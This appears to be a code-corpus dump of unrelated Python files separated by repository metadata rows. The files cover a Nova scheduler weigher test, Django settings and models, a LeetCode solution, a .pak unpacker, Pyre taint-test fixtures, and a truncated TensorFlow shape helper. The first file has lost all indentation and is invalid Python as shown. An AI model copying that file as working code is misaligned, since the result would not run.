# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import objects
from nova.scheduler import weights
from nova.scheduler.weights import affinity
from nova import test
from nova.tests.unit.scheduler import fakes
class SoftWeigherTestBase(test.NoDBTestCase):
def setUp(self):
super(SoftWeigherTestBase, self).setUp()
self.weight_handler = weights.HostWeightHandler()
self.weighers = []
def _get_weighed_host(self, hosts, policy):
request_spec = objects.RequestSpec(
instance_group=objects.InstanceGroup(
policy=policy,
members=['member1',
'member2',
'member3',
'member4',
'member5',
'member6',
'member7']))
return self.weight_handler.get_weighed_objects(self.weighers,
hosts,
request_spec)[0]
def _get_all_hosts(self):
host_values = [
('host1', 'node1', {'instances': {
'member1': mock.sentinel,
'instance13': mock.sentinel
}}),
('host2', 'node2', {'instances': {
'member2': mock.sentinel,
'member3': mock.sentinel,
'member4': mock.sentinel,
'member5': mock.sentinel,
'instance14': mock.sentinel
}}),
('host3', 'node3', {'instances': {
'instance15': mock.sentinel
}}),
('host4', 'node4', {'instances': {
'member6': mock.sentinel,
'member7': mock.sentinel,
'instance16': mock.sentinel
}})]
return [fakes.FakeHostState(host, node, values)
for host, node, values in host_values]
def _do_test(self, policy, expected_weight,
expected_host):
hostinfo_list = self._get_all_hosts()
weighed_host = self._get_weighed_host(hostinfo_list,
policy)
self.assertEqual(expected_weight, weighed_host.weight)
if expected_host:
self.assertEqual(expected_host, weighed_host.obj.host)
class SoftAffinityWeigherTestCase(SoftWeigherTestBase):
def setUp(self):
super(SoftAffinityWeigherTestCase, self).setUp()
self.weighers = [affinity.ServerGroupSoftAffinityWeigher()]
def test_soft_affinity_weight_multiplier_by_default(self):
self._do_test(policy='soft-affinity',
expected_weight=1.0,
expected_host='host2')
def test_soft_affinity_weight_multiplier_zero_value(self):
# We do not know the host, all have same weight.
self.flags(soft_affinity_weight_multiplier=0.0,
group='filter_scheduler')
self._do_test(policy='soft-affinity',
expected_weight=0.0,
expected_host=None)
def test_soft_affinity_weight_multiplier_positive_value(self):
self.flags(soft_affinity_weight_multiplier=2.0,
group='filter_scheduler')
self._do_test(policy='soft-affinity',
expected_weight=2.0,
expected_host='host2')
@mock.patch.object(affinity, 'LOG')
def test_soft_affinity_weight_multiplier_negative_value(self, mock_log):
self.flags(soft_affinity_weight_multiplier=-1.0,
group='filter_scheduler')
self._do_test(policy='soft-affinity',
expected_weight=0.0,
expected_host='host3')
# call twice and assert that only one warning is emitted
self._do_test(policy='soft-affinity',
expected_weight=0.0,
expected_host='host3')
self.assertEqual(1, mock_log.warning.call_count)
class SoftAntiAffinityWeigherTestCase(SoftWeigherTestBase):
def setUp(self):
super(SoftAntiAffinityWeigherTestCase, self).setUp()
self.weighers = [affinity.ServerGroupSoftAntiAffinityWeigher()]
def test_soft_anti_affinity_weight_multiplier_by_default(self):
self._do_test(policy='soft-anti-affinity',
expected_weight=1.0,
expected_host='host3')
def test_soft_anti_affinity_weight_multiplier_zero_value(self):
# We do not know the host, all have same weight.
self.flags(soft_anti_affinity_weight_multiplier=0.0,
group='filter_scheduler')
self._do_test(policy='soft-anti-affinity',
expected_weight=0.0,
expected_host=None)
def test_soft_anti_affinity_weight_multiplier_positive_value(self):
self.flags(soft_anti_affinity_weight_multiplier=2.0,
group='filter_scheduler')
self._do_test(policy='soft-anti-affinity',
expected_weight=2.0,
expected_host='host3')
@mock.patch.object(affinity, 'LOG')
def test_soft_anti_affinity_weight_multiplier_negative_value(self,
mock_log):
self.flags(soft_anti_affinity_weight_multiplier=-1.0,
group='filter_scheduler')
self._do_test(policy='soft-anti-affinity',
expected_weight=0.0,
expected_host='host2')
# call twice and assert that only one warning is emitted
self._do_test(policy='soft-anti-affinity',
expected_weight=0.0,
expected_host='host2')
self.assertEqual(1, mock_log.warning.call_count)
| 40.1 | 78 | 0.590399 |
795bc59e192525653ef717c01e654b89793e1b03 | 4,253 | py | Python | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | """Production settings and globals."""
from os import environ
import dj_database_url
from S3 import CallingFormat
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
INSTALLED_APPS += ('gunicorn',)
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')
if not EMAIL_HOST:
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.sendgrid.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
if not EMAIL_HOST_PASSWORD:
EMAIL_HOST_PASSWORD = environ.get('SENDGRID_PASSWORD', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '')
if not EMAIL_HOST_USER:
EMAIL_HOST_USER = environ.get('SENDGRID_USERNAME', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
DATABASES = {'default': dj_database_url.config()}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
# CACHES = {}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION
########## STORAGE
INSTALLED_APPS += ('storages',)
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
AWS_ACCESS_KEY_ID = get_env_setting('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_setting('AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = "shortener"
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
AWS_HEADERS = {
'Expires': 'Thu, 15 Apr 2020 20:00:00 GMT',
'Cache-Control': 'max-age=86400',
}
AWS_QUERYSTRING_AUTH = False
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
MEDIA_URL = STATIC_URL
########## END STORAGE
########### LOGGING
# Emails site admin when 500 is triggered
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format': "[%(asctime)s] %(levelname)s [%(name)s.%(funcName)s:%(lineno)d] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logutils.colorize.ColorizingStreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
},
},
'loggers': {
'django': {
'handlers': ['console', ],
'propagate': True,
'level': 'ERROR',
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'': {
'handlers': ['console', ],
'level': environ.get('DEBUG_LEVEL', 'ERROR'),
},
}
}
########### END LOGGING
########### HOSTS
ALLOWED_HOSTS = ['2scoops.co', 'twoscoops-co.herokuapp.com', 'www.2scoops.co', ]
########### END HOSTS | 30.163121 | 99 | 0.652481 |
795bc7aa0fd4c54c49f180ea4c33eadf38155117 | 478 | py | Python | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
left, right = -1, len(nums)
while left < right:
mid = (left + right) // 2
if mid < 0: return 0
if nums[mid] == target:
return mid
elif nums[mid] < target:
left = mid + 1
else:
right = mid
return right
| 23.9 | 66 | 0.384937 |
795bc7e2d4bd3fbacc5ad11facc1a8e1abd634e1 | 3,125 | py | Python | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.db import models
class Message(models.Model):
"Generated Model"
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="message_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="message_tasker",
)
message = models.TextField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="message_task",
)
class Rating(models.Model):
"Generated Model"
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="rating_tasker",
)
rating = models.FloatField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
review = models.TextField(
null=True,
blank=True,
)
customer = models.ForeignKey(
"task_profile.CustomerProfile",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="rating_customer",
)
class Task(models.Model):
"Generated Model"
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="task_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="task_tasker",
)
category = models.ForeignKey(
"task_category.Category",
on_delete=models.CASCADE,
related_name="task_category",
)
details = models.TextField()
frequency = models.CharField(
max_length=7,
)
size = models.CharField(
max_length=6,
)
location = models.OneToOneField(
"location.TaskLocation",
on_delete=models.CASCADE,
related_name="task_location",
)
is_confirmed = models.BooleanField()
status = models.CharField(
max_length=10,
)
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_confirmed = models.DateTimeField(
null=True,
blank=True,
)
subcategory = models.ForeignKey(
"task_category.Subcategory",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="task_subcategory",
)
class TaskTransaction(models.Model):
"Generated Model"
status = models.CharField(
max_length=10,
)
timestamp_completed = models.DateTimeField(
null=True,
blank=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="tasktransaction_task",
)
date = models.DateField(
null=True,
blank=True,
)
timestamp_started = models.DateTimeField(
null=True,
blank=True,
)
# Create your models here.
| 24.038462 | 47 | 0.61984 |
795bc8141031b2985a2ac02f741a1fa3b0cc92e2 | 158 | py | Python | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
# Register your models here.
from . import models
admin.site.register(models.User)
admin.site.register(models.ConfirmString) | 26.333333 | 41 | 0.816456 |
795bc8bc177d4643fa0792f54b27550dee0fe953 | 1,706 | py | Python | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 30 | 2018-05-15T02:35:39.000Z | 2022-03-21T09:24:45.000Z | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 1 | 2019-02-20T18:41:35.000Z | 2019-02-20T18:41:35.000Z | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 16 | 2018-06-11T08:05:32.000Z | 2021-03-04T02:15:51.000Z | import collections
import struct
import sys
import os
def UnpackDataPack(input_file):
uc = open(input_file,'rb')
data = uc.read()
original_data = data
version, num_entries, encoding = struct.unpack("<IIB", data[:9])
if version != 4:
raise Exception("Wrong file version in ", input_file)
data = data[9:]
for _ in range(num_entries):
id, offset = struct.unpack("<HI", data[:6])
data = data[6:]
next_id, next_offset = struct.unpack("<HI", data[:6])
filetype = 'bin'
if next_offset-offset>6:
fileheader = original_data[offset:offset+4]
if fileheader == b'\x89PNG':
filetype = 'png'
elif fileheader == b'"use':
filetype = 'js'
elif fileheader == b'RIFF':
filetype = 'avi'
elif fileheader == b'(fun':
filetype = 'js'
elif fileheader == b'<htm':
filetype = 'htm'
elif fileheader == b'<!DO':
filetype = 'htm'
elif fileheader == b'<!do':
filetype = 'htm'
elif original_data[offset:offset+2]==b'\x1f\x8b':
filetype = 'gz'
filew = original_data[offset:next_offset]
if (filetype=='bin')and((filew.find(b'padding:')!=-1)or(filew.find(b'-webkit')!=-1)or(filew.find(b'margin:')!=-1)or(filew.find(b'width')!=-1)or(filew.find(b'styles')!=-1)or(filew.find(b'display')!=-1)or(filew.find(b'!important')!=-1)):
filetype = 'css'
if (filew.find(b'function')!=-1):
filetype = 'js'
of = open('Unpack\{0}.{1}'.format(id,filetype),'wb')
of.write(filew)
of.close()
def main():
if len(sys.argv) > 1:
os.chdir(sys.path[0])
UnpackDataPack(sys.argv[1])
if __name__ == '__main__':
main() | 34.816327 | 240 | 0.582063 |
795bc8c8f25b06722287b5937acef958391568b6 | 3,311 | py | Python | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.8.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class FlowEntity(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'flow': 'FlowDTO'
}
attribute_map = {
'flow': 'flow'
}
def __init__(self, flow=None):
"""
FlowEntity - a model defined in Swagger
"""
self._flow = None
if flow is not None:
self.flow = flow
@property
def flow(self):
"""
Gets the flow of this FlowEntity.
:return: The flow of this FlowEntity.
:rtype: FlowDTO
"""
return self._flow
@flow.setter
def flow(self, flow):
"""
Sets the flow of this FlowEntity.
:param flow: The flow of this FlowEntity.
:type: FlowDTO
"""
self._flow = flow
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, FlowEntity):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 26.701613 | 479 | 0.525823 |
795bc9120b193e941b608f1530d681ff5d9b1fe9 | 285 | py | Python | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null | my-shop/myshop/serializers.py | tomaszd/django-shop | 6db26e8cb8cdd86281c6b15ac25223d324b9e3c1 | [
"BSD-3-Clause"
] | null | null | null |
from shop.serializers.bases import ProductSerializer
class ProductDetailSerializer(ProductSerializer):
class Meta(ProductSerializer.Meta):
fields = ['product_name', 'slug', 'unit_price', 'manufacturer', 'card_type', 'speed',
'product_code', 'storage']
| 31.666667 | 93 | 0.698246 |
795bca1e4b1b43ffeb3ab7aafed3ae76857b84bf | 90 | py | Python | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | src/docker_flask/docker/conf.py | Smeaol22/docker_flask | f6a6bae1c92a8d4f81de310406d9868a74f8af7b | [
"BSD-2-Clause"
] | null | null | null | DOCKER_IMAGE = "docker_flask:0.0.1"
EXPOSE_PORT = 8180
BASE_CONTAINER_ADDRESS = '127.0.0'
| 22.5 | 35 | 0.766667 |
795bca2e144640be3e98bd5aac1dbae52f4dfc4d | 83 | py | Python | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | 1 | 2019-06-09T00:04:56.000Z | 2019-06-09T00:04:56.000Z | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | 19 | 2019-06-09T14:45:52.000Z | 2019-06-17T18:52:53.000Z | Domains/Python/01 - Introduction/Arithmetic Operators/solution.py | abhinavgunwant/hackerrank-solutions | e016366cb6a9fac562a754d2b230fef907080733 | [
"MIT"
] | null | null | null | # Get a
a = int(input())
# Get b
b = int(input())
print(a+b)
print(a-b)
print(a*b) | 10.375 | 16 | 0.566265 |
795bcb38a2192072c8aee722a7d703f93d4a8c26 | 4,359 | py | Python | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | ddainesefb/pyre-check | dedd67493f4334b6b5bf446260ed364b35b4a6aa | [
"MIT"
] | null | null | null | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | ddainesefb/pyre-check | dedd67493f4334b6b5bf446260ed364b35b4a6aa | [
"MIT"
] | 1 | 2021-08-16T12:11:37.000Z | 2021-08-16T12:11:37.000Z | source/interprocedural_analyses/taint/test/integration/taint_in_taint_out.py | abishekvashok/pyre-check | 20ae7df26216db06fcb17246f6125f4b6655890f | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from builtins import __test_sink, __test_source
from typing import Dict, List, Tuple
def some_service(id):
...
def _unpack(tuple):
...
class DataRecord:
...
class Data:
def __init__(self, a, b):
self.a = a
self.b = b
def get_data(x):
return {"name": x, "id": x}
def product_data(x):
data = get_data(x)
if x:
parent = product_data(x.parent)
else:
parent = None
is_blocked = some_service(data.id)
report_tuple = DataRecord(id=data.id, username=data.name, isBlocked=is_blocked)
return {
"report": _unpack(report_tuple),
"id": data.id,
"parent_data": parent,
"name": data.name,
}
def product_data_wrapper(x):
return product_data(x)
def tito():
return product_data_wrapper(__test_source())
def via_getattr(x, y):
return getattr(x, "foo", y)
class Recursive:
def __init__(self, select):
self.init_list = [
f[0].target.attname for f in select[self.cols_start : self.cols_end]
]
self.related = get_related(select)
def get_related(select):
return Recursive(select)
class FieldIsTITO:
add_tito: int = 1
def adds_tito(x: FieldIsTITO) -> int:
return x.add_tito
class InheritsFromTITO(FieldIsTITO):
pass
def adds_tito_inherited(x: InheritsFromTITO) -> int:
return x.add_tito
def adds_tito_with_indirect_sink(src: FieldIsTITO) -> None:
indirect_sink(src)
def indirect_sink(x: FieldIsTITO) -> None:
__test_sink(x.add_tito)
def issue_with_indirect_sink_tito():
x = __test_source()
adds_tito_with_indirect_sink(x)
def approximate_return_access_paths(x):
return {
"a": x.a,
"b": x.b,
"c": x.c,
"d": x.d,
"e": x.e,
"f": x.f,
"g": x.g,
"h": x.h,
"j": x.j,
"k": x.k,
"l": x.l,
}
def approximate_return_access_paths_common_prefix_input(x):
return {
"a": x.y.a,
"b": x.y.b,
"c": x.y.c,
"d": x.y.d,
"e": x.y.e,
"f": x.y.f,
"g": x.y.g,
"h": x.y.h,
"j": x.y.j,
"k": x.y.k,
"l": x.y.l,
}
def approximate_return_access_paths_common_prefix_output(x):
return {
"a": {
"a": x.a,
"b": x.b,
"c": x.c,
"d": x.d,
"e": x.e,
"f": x.f,
"g": x.g,
"h": x.h,
"j": x.j,
"k": x.k,
"l": x.l,
}
}
async def return_taint(tainted: str, b1: str, b2: str) -> Tuple[str, str, str]:
return tainted, b1, b2
async def test_tuple_tito_indices():
tainted, b1, b2 = await return_taint(__test_source(), "", "")
__test_sink(b2)
def return_taint_in_list(tainted: str, a: str, b: str) -> List[str]:
return [tainted, a, b]
def add_feature(arg):
return arg
def tito_with_feature(arg):
if arg:
return arg
else:
return add_feature(arg)
def test_always_via_feature():
__test_sink(tito_with_feature(__test_source()))
# Test TITO through explicit super.
class GetQuery:
def __init__(self, arg):
self.arg = arg
class GetUser(GetQuery):
def __init__(self, arg):
GetQuery.__init__(self, arg)
def test_explicit_call_to_superclass():
user = GetUser(__test_source())
__test_sink(user.arg)
def evaluate_lazy(payload: Dict[str, str]):
return {key: value for key, value in payload.items()}
def test_simplified_evaluator():
__test_sink(evaluate_lazy(__test_source()))
class ComplexEvaluator:
def evaluate_lazy_field(self, field):
if callable(field):
return field()
else:
return field
def evaluate_lazy_payload(self, payload):
def _evaluate(field):
if isinstance(field, dict):
return self.evaluate_lazy_payload(field)
return self.evaluate_lazy_field(field)
return {key: _evaluate(value) for key, value in payload.items()}
def test_complex_evaluator(evaluator: ComplexEvaluator):
__test_sink(evaluator.evaluate_lazy_payload(__test_source()))
| 19.373333 | 83 | 0.590961 |
795bcb612af9979613f4b9db3686d9152faeac50 | 833 | py | Python | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | djangopwa/urls.py | IsmaelBarros/Django_pwa | 7d903dda9c0e3f35d7d6df7b0350b0856f36a883 | [
"MIT"
] | null | null | null | """djangopwa URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path(r'', include('posts.urls')),
path('', include('pwa.urls')),
]
| 34.708333 | 77 | 0.695078 |
795bcbac231b87126d0462b08df549784625204a | 485 | py | Python | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | null | null | null | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | 2 | 2022-02-28T21:04:22.000Z | 2022-03-01T21:05:37.000Z | kaffepause/breaks/enums.py | Eirsteir/kaffepause | 77535f057e68d575831e3a44f36285ab2fe621d4 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.translation import gettext as _
from kaffepause.common.bases import NeomodelRelationshipEnum
class InvitationReply(models.TextChoices):
ACCEPTED = "accepted"
DECLINED = "declined"
IGNORED = "ignored"
class BreakRelationship(NeomodelRelationshipEnum):
PARTICIPATED_IN = _("Participated in")
SENT = _("Sent")
TO = _("To")
REGARDING = _("Regarding")
ACCEPTED = _("Accepted")
DECLINED = _("Declined")
| 24.25 | 60 | 0.715464 |
795bcbcf5772221d7f5fb9d5a52c8acf2c1ec97c | 687 | py | Python | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | 14 | 2021-09-01T15:46:50.000Z | 2022-03-28T00:15:30.000Z | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | null | null | null | esgmetrics/esgscraper/__main__.py | shweta-29/Sustainability_Company_Information | 293091b1ae168d4c1bfa6e2fda42d80daabe10a3 | [
"MIT"
] | 4 | 2021-12-18T06:50:57.000Z | 2022-03-30T11:25:18.000Z | """
This script allows the user to scrape the ESG, CSR ratings and financial
metrics of the companies from the following websites: SustainAnalytics,
S&P Global, CSR HUB, MSCI, Yahoo Finance
This tool accepts Company's names list in comma separated value
file (.csv) format as input.
The output is a .csv file with Company name and its corresponding ESG/
CSR ratings/Financial Metrics
To run on example dataset (Forbes.csv provided with this package), enter 0
for Companies filename and Header Name
This script will ask the user to input a number that pertains to the website
from which the information has to be scraped
"""
from .scraper import WebScraper
WebScraper.get_esgdata()
| 31.227273 | 76 | 0.791849 |
795bccb800e15a72f566065a8eaa253ab2935164 | 18,905 | py | Python | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 1 | 2018-11-15T08:44:10.000Z | 2018-11-15T08:44:10.000Z | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/distributions/python/ops/shape.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 1 | 2021-03-06T02:46:54.000Z | 2021-03-06T02:46:54.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A helper class for inferring Distribution shape."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
class _DistributionShape(object):
"""Manage and manipulate `Distribution` shape.
Terminology:
Recall that a `Tensor` has:
- `shape`: size of `Tensor` dimensions,
- `ndims`: size of `shape`; number of `Tensor` dimensions,
- `dims`: indexes into `shape`; useful for transpose, reduce.
`Tensor`s sampled from a `Distribution` can be partitioned by `sample_dims`,
`batch_dims`, and `event_dims`. To understand the semantics of these
dimensions, consider when two of the three are fixed and the remaining
is varied:
- `sample_dims`: indexes independent draws from identical
parameterizations of the `Distribution`.
- `batch_dims`: indexes independent draws from non-identical
parameterizations of the `Distribution`.
- `event_dims`: indexes event coordinates from one sample.
The `sample`, `batch`, and `event` dimensions constitute the entirety of a
`Distribution` `Tensor`'s shape.
The dimensions are always in `sample`, `batch`, `event` order.
Purpose:
This class partitions `Tensor` notions of `shape`, `ndims`, and `dims` into
`Distribution` notions of `sample,` `batch,` and `event` dimensions. That
is, it computes any of:
```
